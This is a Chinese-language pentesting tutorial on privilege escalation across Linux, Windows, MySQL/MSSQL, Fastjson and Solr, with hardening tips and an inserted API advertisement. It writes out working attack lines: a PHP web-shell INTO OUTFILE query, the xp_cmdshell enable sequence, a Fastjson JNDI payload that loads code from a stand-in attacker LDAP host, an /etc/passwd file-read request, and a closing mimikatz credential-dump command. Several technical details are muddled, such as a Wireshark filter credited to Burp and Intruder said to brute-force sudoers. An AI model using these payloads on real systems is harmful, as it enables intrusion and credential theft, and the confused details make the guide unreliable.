1. 权限提升漏洞的本质与分类
权限提升(Privilege Escalation)是安全测试中最关键的环节之一,指攻击者通过利用系统配置缺陷、软件漏洞或逻辑错误,从普通用户权限获取更高权限(如root/administrator)的过程。根据操作系统环境,主要分为以下两类:
1.1 Linux系统提权路径
- 内核漏洞利用:如DirtyPipe(CVE-2022-0847)、DirtyCow(CVE-2016-5195)等经典内核提权漏洞
- SUID滥用:查找具有SUID位的非常规可执行文件(如find / -perm -4000 2>/dev/null)
- 环境变量劫持:通过LD_PRELOAD或PATH变量注入恶意库
- 计划任务/服务漏洞:利用crontab、systemd服务配置不当写入恶意脚本
- 密码哈希破解:提取/etc/shadow文件进行离线爆破
1.2 Windows系统提权路径
- 系统服务漏洞:如PrintNightmare(CVE-2021-34527)、EternalBlue(MS17-010)
- 令牌窃取:通过SeImpersonatePrivilege等特权进行令牌模拟
- 注册表键滥用:修改AlwaysInstallElevated等键值实现静默提权
- DLL劫持:利用应用程序加载DLL的搜索顺序缺陷
- 组策略首选项(GPP):解密获取SYSVOL中存储的密码
实际测试中发现,约60%的提权案例源于配置错误而非0day漏洞。定期检查系统加固指南(如CIS Benchmark)可有效降低风险。
需要模型API调用? 免费领10W Token,多模型网关一键接入 Claude、DeepSeek 等主流模型。
2. 数据库提权专项突破
2.1 MySQL提权技术链
- UDF提权:通过lib_mysqludf_sys等库执行系统命令
sql复制SELECT sys_eval('id'); - 写WebShell:利用into outfile写入PHP后门(需secure_file_priv为空)
sql复制SELECT '<?php system($_GET[cmd]);?>' INTO OUTFILE '/var/www/shell.php' - CVE漏洞利用:如CVE-2016-6662(MySQL远程代码执行)
2.2 MSSQL提权技术链
- xp_cmdshell滥用:开启后直接执行系统命令
sql复制EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'whoami' - OLE自动化过程:通过sp_oacreate调用WScript.Shell
- 链接服务器攻击:跨数据库执行命令
3. 最新漏洞实战利用案例
3.1 Fastjson <=1.2.83 RCE漏洞利用
- 漏洞检测:发送特殊构造的JSON数据包观察延迟响应
http复制POST / HTTP/1.1 {"@type":"java.net.Inet4Address","val":"dnslog.cn"} - 利用链构造:结合JNDI注入实现远程代码执行
java复制{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker.com/Exploit","autoCommit":true} - 防御绕过:最新版本需结合AutoType白名单绕过
3.2 Solr文件读取漏洞(POC-YAML-SOLR-FILEREAD)
- 漏洞验证:访问核心配置文件路径
code复制/solr/admin/cores?wt=json&indexInfo=false - 文件读取:通过dataimport参数读取任意文件
code复制/solr/demo/dataimport?command=full-import&dataConfig=<dataConfig> <dataSource type="FileDataSource"/> <script></script> <document><entity name="entity" processor="XPathEntityProcessor" url="file:///etc/passwd" /></document> </dataConfig>
4. BurpSuite在提权中的高阶用法
4.1 点击劫持漏洞构造
- 使用Burp Repeater修改HTTP响应头:
http复制X-Frame-Options: DENY → X-Frame-Options: ALLOW-FROM attacker.com - 制作恶意页面:iframe嵌套目标管理界面配合CSS遮罩
html复制<iframe src="http://target/admin" style="opacity:0.1;"></iframe>
4.2 权限提升流量分析技巧
- Filter筛选器:
http.status_code == 200 && http.request.method == POST - Intruder爆破:针对sudoers文件测试弱密码
- Comparer比对:分析提权前后的进程差异
5. 防御加固建议
5.1 Linux系统加固清单
- 定期更新内核版本(
uname -r检查) - 清理无用SUID文件(
find / -perm -4000 -exec ls -ld {} \;) - 限制sudo权限(
visudo编辑时启用%sudo ALL=(ALL:ALL) PASSWD: ALL)
5.2 Windows系统加固清单
- 关闭不必要的服务(如PowerShell执行
Get-Service | Where-Object {$_.Status -eq 'Running'}) - 启用LSA保护(注册表
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa新建RunAsPPL DWORD=1) - 配置AppLocker限制脚本执行
实际渗透测试中,提权成功后建议立即执行mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"抓取内存凭证,横向移动阶段这些信息往往比root权限更有价值。
